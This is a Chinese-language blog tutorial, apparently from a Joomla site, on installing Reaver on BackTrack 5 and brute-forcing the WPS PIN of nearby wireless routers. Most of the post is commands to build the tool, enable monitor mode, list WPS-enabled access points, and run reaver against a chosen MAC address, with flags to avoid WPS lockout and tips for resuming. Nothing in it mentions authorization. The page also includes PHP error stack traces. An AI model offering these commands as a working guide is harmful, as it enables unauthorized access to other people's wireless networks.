reaver 安装 穷举PIN

Reaver目前只支持以下网卡:

 

The following wireless drivers have been tested or reported to work successfully with Reaver:

  • ath9k
  • rtl8187
  • carl19170
  • ipw2000
  • rt2800pci
  • rt73usb

 



安装 bt5 到硬盘

下载bt5 cd  - 运行  进入界面 选择安装

 

安装reaver

输入:
cd Desktop
然后输入:
svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps-read-only
依次输入:
cd reaver-wps-read-only
cd src
./configure
make
make install

 

另外如果安装过程中出现bash: ./configure: Permission denied,不要着急这是linux下常见问题
运行
chmod +x configure,然后再运行./configure

sh ./configure

 

开启监听模式,并搜索支持wps的ap,
支好天线,准备开始干活。

 

输入:
airmon-ng start wlan0

输入:
wash -i mon0 -C (注意大小写)
查看支持WPS的AP
长时间无反应按Ctrl+C,结束进程

9.开始穷举:

输入:
reaver -i mon0 -b MAC地址 -a -S -vv (注意大小写)
建议增加 -d 3 -t 3参数,防止路由WPS被跑死,导致穷举中止。
reaver -i mon0 -b MAC地址 -S -vv -d 3 -t 3


好了,虚拟机最小化,该玩就玩该干嘛干嘛去吧,慢慢等着穷举结束。

最后说下保存进度方法:

1)在穷举过程中随时可按Ctrl+C结束进程;

2)无论何时,只要再跑之前跑过的MAC地址,进程都是连续的无需从0%重新开始,这是硬盘版的好处。根本用不着快照功能

3)小技巧:下次启动BT5按下光标控制键(方向键)“上”键然后回车,就可以看到上次输入的指令,无需再输入,选中上次没跑完的指令按下回车继续跑。(需上次正常关机,X视图使用右上角关机按钮关机或在终端输入shutdown -q 0关机)

 


( ! ) Warning: count(): Parameter must be an array or an object that implements Countable in /var/www/vhosts/shan.info/httpdocs/templates/gk_publisher/html/com_k2/templates/default/item.php on line 169
Call Stack
#TimeMemoryFunctionLocation
10.0006403304{main}( ).../index.php:0
20.04901320944Joomla\CMS\Application\SiteApplication->execute( ).../index.php:49
30.04901320944Joomla\CMS\Application\SiteApplication->doExecute( ).../CMSApplication.php:196
40.20082979128Joomla\CMS\Application\SiteApplication->dispatch( ).../SiteApplication.php:233
50.20133003536Joomla\CMS\Component\ComponentHelper::renderComponent( ).../SiteApplication.php:194
60.20233058864Joomla\CMS\Component\ComponentHelper::executeComponent( ).../ComponentHelper.php:377
70.20253075920require_once( '/var/www/vhosts/shan.info/httpdocs/components/com_k2/k2.php' ).../ComponentHelper.php:402
80.20923220008K2ControllerItem->execute( ).../k2.php:64
90.20923220008K2ControllerItem->display( ).../BaseController.php:710
100.21603489088K2ControllerItem->display( ).../item.php:78
110.21603489088K2ControllerItem->display( ).../controller.php:19
120.21763507608Joomla\CMS\Cache\Controller\ViewController->get( ).../BaseController.php:663
130.22103528024K2ViewItem->display( ).../ViewController.php:102
140.28154115952K2ViewItem->display( ).../view.html.php:742
150.28154115952K2ViewItem->loadTemplate( ).../HtmlView.php:230
160.28424290352include( '/var/www/vhosts/shan.info/httpdocs/templates/gk_publisher/html/com_k2/templates/default/item.php' ).../HtmlView.php:701
  • Published in reaver
  • Read 3959 times
More in this category: reaver 命令 »

( ! ) Notice: Only variables should be assigned by reference in /var/www/vhosts/shan.info/httpdocs/templates/gk_publisher/html/com_k2/templates/default/item.php on line 478
Call Stack
#TimeMemoryFunctionLocation
10.0006403304{main}( ).../index.php:0
20.04901320944Joomla\CMS\Application\SiteApplication->execute( ).../index.php:49
30.04901320944Joomla\CMS\Application\SiteApplication->doExecute( ).../CMSApplication.php:196
40.20082979128Joomla\CMS\Application\SiteApplication->dispatch( ).../SiteApplication.php:233
50.20133003536Joomla\CMS\Component\ComponentHelper::renderComponent( ).../SiteApplication.php:194
60.20233058864Joomla\CMS\Component\ComponentHelper::executeComponent( ).../ComponentHelper.php:377
70.20253075920require_once( '/var/www/vhosts/shan.info/httpdocs/components/com_k2/k2.php' ).../ComponentHelper.php:402
80.20923220008K2ControllerItem->execute( ).../k2.php:64
90.20923220008K2ControllerItem->display( ).../BaseController.php:710
100.21603489088K2ControllerItem->display( ).../item.php:78
110.21603489088K2ControllerItem->display( ).../controller.php:19
120.21763507608Joomla\CMS\Cache\Controller\ViewController->get( ).../BaseController.php:663
130.22103528024K2ViewItem->display( ).../ViewController.php:102
140.28154115952K2ViewItem->display( ).../view.html.php:742
150.28154115952K2ViewItem->loadTemplate( ).../HtmlView.php:230
160.28424290352include( '/var/www/vhosts/shan.info/httpdocs/templates/gk_publisher/html/com_k2/templates/default/item.php' ).../HtmlView.php:701
back to top